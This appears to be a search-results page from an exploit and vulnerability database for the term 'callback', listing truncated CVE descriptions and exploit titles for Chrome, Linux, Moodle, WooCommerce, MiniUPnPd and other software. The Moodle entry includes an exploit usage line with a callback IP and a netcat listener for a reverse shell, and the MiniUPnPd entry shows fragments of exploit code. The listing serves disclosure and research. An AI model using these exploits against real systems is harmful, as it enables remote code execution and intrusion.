3968 matches found
DEBIAN-CVE-2018-20449
The hidma_chan_stats function in drivers/dma/qcom/hidma_dbg.c in the Linux kernel 4.14.90 allows local users to obtain sensitive address information by reading "callback=" lines in a debugfs file...
Chrome V8TrustedTypePolicyOptions::ToImpl Type Confusion
Chrome: Type confusion in V8TrustedTypePolicyOptions::ToImpl. VULNERABILITY DETAILS: The binding code generator doesn't add checks to ensure that the callback properties of a dictionary are indeed JS functions. For example, for the TrustedTypePolicyOptions dictionary:...
Chrome V8TrustedTypePolicyOptions::ToImpl Type Confusion Vulnerability
Chrome: Type confusion in V8TrustedTypePolicyOptions::ToImpl. VULNERABILITY DETAILS: The binding code generator doesn't add checks to ensure that the callback properties of a dictionary are indeed JS functions. For example, for the TrustedTypePolicyOptions dictionary:...
Moodle 3.4.1 - Remote Code Execution
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1. Parameters: user: the account username; pass: the password to the account; ip: callback IP; port: callback port; course: valid course ID belonging to the teacher. Make sure you're running a netcat listener on the...
CVE-2019-9595
AppCMS 2.0.101 allows XSS via the upload/callback.php params parameter...
Google Chrome < M72 - FileWriterImpl Use-After-Free Exploit
Google Chrome GetBlobDataFromBlobPtr(std::move(blob), base::BindOnce(&FileWriterImpl::DoWrite, base::Unretained(this), std::move(callback), position)); Note that the last argument to GetBlobDataFromBlobPtr is a callback object bound to base::Unretained(this). And the implementation of GetBlobDataFromBlobPtr...
Google Chrome M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free
Google Chrome M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free There's a race-condition / object-lifetime issue in the browser process when the browser process shutdown races against the IO thread handling mojo messages from the renderer. It's at least possible to trigger...
Google Chrome < M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free
There's a race-condition / object-lifetime issue in the browser process when the browser process shutdown races against the IO thread handling mojo messages from the renderer. It's at least possible to trigger this by closing the browser while running the attached poc; I'm not sure if there's a...
Google Chrome < M72 - FileWriterImpl Use-After-Free
There's a use-after-free in the implementation of the FileWriter component of the mojo bindings for the filesystem API. The browser-process side of this API is defined in https://cs.chromium.org/chromium/src/thirdparty/blink/public/mojom/filesystem/filewriter.mojom?type=cs&sq=package:chromium&g=0...
WinRAR code execution vulnerability hidden for 19 years - vulnerability warning - the black bar safety net
The researchers found WinRAR logic vulnerabilities that can give full control of the victim's computer. The exploit only requires extracting a compressed file to work; more than 5 million users are affected. More importantly, the vulnerability has been there for 19 years, forcing WinRAR...
WordPress WooCommerce GloBee Payment Gateway 1.1.1 Bypass / Spoofing
<?php Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin Payment Bypass / Unauthorized Order Status Spoofing. Discovery Date: 14.12.2018. Public Disclosure Date: 14.02.2019. Exploit Author: GeekHack. Contact: https://t.me/GeekHack. Vendor Homepage: https://globee.com/...
WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing
<?php Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin Payment Bypass / Unauthorized Order Status Spoofing. Discovery Date: 14.12.2018. Public Disclosure Date: 14.02.2019. Exploit Author: GeekHack. Contact: https://t.me/GeekHack. Vendor Homepage: https://globee.com/...
WordPress WooCommerce Plugin - Payment Bypass / Unauthorized Order Status Spoofing
Exploit for php platform in category web applications. WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing. <?php Exploit Title: WordPress WooCommerce - GloBee...
CVE-2019-7346
A CSRF check issue exists in ZoneMinder through 1.32.3 as whenever a CSRF check fails, a callback function is called displaying a "Try again" button, which allows resending the failed request, making the CSRF attack successful...
DEBIAN-CVE-2019-7346
A CSRF check issue exists in ZoneMinder through 1.32.3 as whenever a CSRF check fails, a callback function is called displaying a "Try again" button, which allows resending the failed request, making the CSRF attack successful...
UBUNTU-CVE-2019-7346
A CSRF check issue exists in ZoneMinder through 1.32.3 as whenever a CSRF check fails, a callback function is called displaying a "Try again" button, which allows resending the failed request, making the CSRF attack successful...
MiniUPnPd 2.1 - Out-of-Bounds Read
MiniUPnPd 2.1 - Out-of-Bounds Read !/usr/bin/python3 miniupnpd 0: self.server.notify += line line = self.rfile.read1 except: pass self.wfile.writeb"HTTP/1.1 200 OK\r\n\r\n" def splash: print" miniupnpd '.formatargs.callbackip,args.callbackport,callbackuri, 'Timeout': 'Second-20' server =...
CVE-2018-20477
An issue was discovered in S-CMS 3.0. It allows SQL Injection via the bank/callback1.php Pno field...
S-CMS SQL Injection Vulnerability (CNVD-2018-26676)
S-CMS is a content management system (CMS) based on PHP and MySQL. A SQL injection vulnerability exists in the bank/callback1.php file in S-CMS version 3.0, which stems from the program's failure to filter the 'Pno' field, and can be exploited by remote attackers to execute SQL statements with the...